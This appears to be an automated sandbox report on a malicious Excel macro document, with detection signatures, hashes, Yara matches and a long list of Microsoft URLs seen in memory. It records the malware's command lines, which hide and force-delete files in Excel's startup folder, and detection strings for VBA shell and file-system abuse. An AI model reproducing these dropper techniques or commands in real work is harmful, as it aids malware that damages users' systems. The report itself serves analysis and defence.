Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fWWE9vHC67.xls

Overview

General Information

Sample Name:fWWE9vHC67.xls
Analysis ID:800337
MD5:13ceec74c68f8a31af8a6de0c7d81662
SHA1:7fe06b0c16f5b48b09e4f85938c7edcd8942b485
SHA256:b519ea74ee6a89eb9187e6c669b1a2dd10d7437bba34c3f8ff4398edd712c847
Tags:xls
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Creates and opens a fake document (probably a fake document to hide exploiting)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5348 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 5164 cmdline: C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 4692 cmdline: attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS" MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • cmd.exe (PID: 5148 cmdline: C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DFB6A3757021F38DB9.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth (Nextron Systems)
  • 0xe3a0:$s1: \Common Files\Microsoft Shared\
  • 0xe4e2:$s1: \Common Files\Microsoft Shared\
  • 0x74f9:$s2: Scripting.FileSystemObject
  • 0x7a2b:$s2: Scripting.FileSystemObject
  • 0x821b:$s2: Scripting.FileSystemObject
  • 0x5df1:$a2: WScript.Shell
  • 0x61c1:$a2: WScript.Shell
  • 0x6529:$a2: WScript.Shell
  • 0x6aef:$a2: WScript.Shell
  • 0x7fd1:$a2: WScript.Shell
  • 0x8279:$a2: WScript.Shell
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\k4.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
  • 0x7c07:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x1c4ede:$a6: auto_open
  • 0x1d10e7:$a6: auto_open
  • 0x1d29e4:$a6: auto_open
  • 0x1d4557:$a6: auto_open
  • 0x13b5:$x1: * #,##0
  • 0x13ed:$x1: * #,##0
  • 0x1422:$x1: * #,##0
  • 0x1462:$x1: * #,##0
  • 0x15f1:$x1: * #,##0
  • 0x16a0:$x1: * #,##0

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: fWWE9vHC67.xlsAvira: detected
Multi AV Scanner detection for submitted file
Source: fWWE9vHC67.xlsReversingLabs: Detection: 82%
Source: fWWE9vHC67.xlsVirustotal: Detection: 74%Perma Link
Machine Learning detection for sample
Source: fWWE9vHC67.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.aadrm.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.aadrm.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.cortana.ai
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.office.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.onedrive.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://api.scheduler.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://augloop.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://augloop.office.com/v2
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cdn.entity.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://config.edge.skype.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cortana.ai
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cortana.ai/api
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://cr.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://d.docs.live.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dev.cortana.ai
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://devnull.onenote.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://directory.services.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://graph.windows.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://graph.windows.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://invites.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://lifecycle.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://login.windows.local
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://make.powerautomate.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://management.azure.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://management.azure.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.action.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://messaging.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ncus.contentsync.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://officeapps.live.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://onedrive.live.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office365.com
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office365.com/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://powerlift.acompli.net
Source: D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
